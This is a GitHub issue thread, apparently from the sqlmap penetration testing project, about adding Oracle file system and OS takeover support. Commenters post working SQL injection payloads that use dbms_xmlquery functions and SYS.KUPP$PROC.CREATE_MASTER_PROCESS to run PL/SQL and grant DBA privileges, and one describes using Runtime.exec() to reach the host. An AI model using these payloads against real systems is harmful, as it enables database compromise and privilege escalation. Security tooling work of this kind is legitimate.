File and operating system takeover support for Oracle #26

Open

Open

File and operating system takeover support for Oracle#26

Assignees

Labels

enhancementhightakeover

Milestone

opened

on Jun 26, 2012

Member

Add support to takeover the file system when the back-end DBMS is Oracle.

References:

http://delicious.com/inquis/oracle

ghost assigned

on Jun 26, 2012

We were looking at this: http://code.google.com/p/bsqlbf-v2/ as an example of how to do takeover on Oracle DB. Perhaps we will have a pull request ready soon <3

mentioned this

Operating system takeover support for Oracle #19

@stamparm @sqlmapproject @inquisb this is possible, though you would have to provide multiple methods and bruteforce your way to the right one or use DBMS fingerprinting to figure out the right trick. Would certainly be a worthy addition to it! See my above link.

MemberAuthor

More details: http://kitkatsatonthemat.blogspot.com/2011/11/i-herd-you-like-oracle-dawg-so-i-put.html

mentioned this

on Jul 12, 2012

Option to ignore empty cells #75

Maybe this helps:
In Oracle there are 2 Function granted to PUBLIC by default:
dbms_xmlquery.newcontext()
dbms_xmlquery.getxml()

These 2 functions allow execution of anonymous PLSQL blocks within an SQL Statement. Extremly helpful when injecting in Oracle Databases.
Examples:
select dbms_xmlquery.newcontext('declare pragma autonomous_transaction; begin execute immediate '' create synonym asdf for SCHEMA.TABLE ''; commit; end;') from dual

select dbms_xmlquery.getxml('declare pragma autonomous_transaction; begin execute immediate '' create synonym asdf for SCHEMA.TABLE ''; commit; end;') from dual

With this technique it would be possible to create a Java Package with Runtime.exec() to takeover the Databasehost (user needs the rights(grants) for this operation, but this can be checked via the oracle system tables).

mentioned this

on Nov 10, 2012

error-based false #231

MemberAuthor

@infodox where's your pull request? :)

mentioned this

on May 14, 2014

Os-bof not permitted when the subquery follows = , <= > >= #691

Member

http://www.6code.net/2015/08/execute-os-command-in-oracle-database.html

mentioned this

on Jul 17, 2016

tamper script "bigip" [CRITICAL] missing function #2032

Bump

There seem to be a few methods to execute OS Commands and through the SYS.KUPP$PROC.CREATE_MASTER_PROCESS function in Oracle up to 11g2.

For example if a URL is vulnerable to AND based SQLi, you could run <url>/id=2' and (Select SYS.KUPP$PROC.CREATE_MASTER_PROCESS('EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''GRANT dba TO user;''''; END;'';') from dual) is not null--

I used this in a test scenario and was able to create a user and grant it DBA on Oracle 11g2.

I came across this whitepaper that goes into alot more detail, including privilege escalation.
I hope it might be helpfull.
https://media.blackhat.com/bh-us-10/whitepapers/Siddharth/BlackHat-USA-2010-Siddharth-Hacking-Oracle-from-the-Web-wp.pdf

added a commit that references this issue

Implementing support for --file-read on Oracle (Issue #26)

to join this conversation on GitHub. Already have an account? Sign in to comment

Metadata

Assignees

bdamele

Labels

enhancementhightakeover

Type

No type

Projects

No projects

Milestone

1.1
Closed Jan 2, 2017, 84% complete

Relationships

None yet

Development

No branches or pull requests

Participants